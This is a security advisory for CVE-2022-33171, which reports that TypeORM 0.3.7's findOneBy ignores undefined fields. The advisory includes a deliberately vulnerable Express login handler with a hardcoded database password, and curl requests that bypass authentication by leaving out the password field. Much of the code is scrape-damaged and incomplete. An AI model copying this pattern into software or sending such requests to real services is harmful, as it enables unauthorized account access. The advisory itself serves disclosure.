Authored by Andrii Kostenko

TypeORM version 0.3.7 suffers from an information disclosure vulnerability.

advisories | CVE-2022-33171

I found what I think is a vulnerability in the latest typeorm 0.3.7.
TypeORM v0.3 has a new findOneBy method instead of findOneById() and it is
the only way to get a record by id

Sending undefined as a value in this method removes this parameter from the
query. This leads to the data exposure.

For example:
Users.findOneBy({id:}) with /?id=12345 produces SELECT * FROM
Users WHERE id=12345 LIMIT 1 while removing id from the query string
produces SELECT * FROM Users LIMIT 1

Maintainer also does not consider this a vulnerability and stated the
root cause is bad input validation. I tried to contact Snyk, but they
took the author's position. I still think it is a major vulnerability

Vulnerable app:

import {
} from 'typeorm';
import express from 'express';
import {Application, Request, Response} from 'express';

let connection: Connection;

async function myListener(request: Request, response: Response) {
connection = await createConnection(connectionOpts);
const userRepo: Repository<User> = connection.getRepository(User);

const { email, password }: Record<string, string> = request.body;
const user = await userRepo.findOneBy({ email, password });
return response.json(user ? 'ok' : 'denied');

@Entity({ name: 'Users' })
class User {
id!: number;
email!: string;
password!: string;

const connectionOpts: ConnectionOptions = {
type: 'mysql',
name: 'myconnection',
host: 'localhost',
username: 'root',
password: 'test123',
database: 'domurl',
entities: [User]

const app: Application = express();
app.use(express.json()); "/authenticate", myListener);
app.listen(4444, () => console.log('App started'));


curl -H 'Content-Type:
application/json' --data '{"email": "[email protected]", "password":


curl -H 'Content-Type:
application/json' --data '{"email": "[email protected]"}'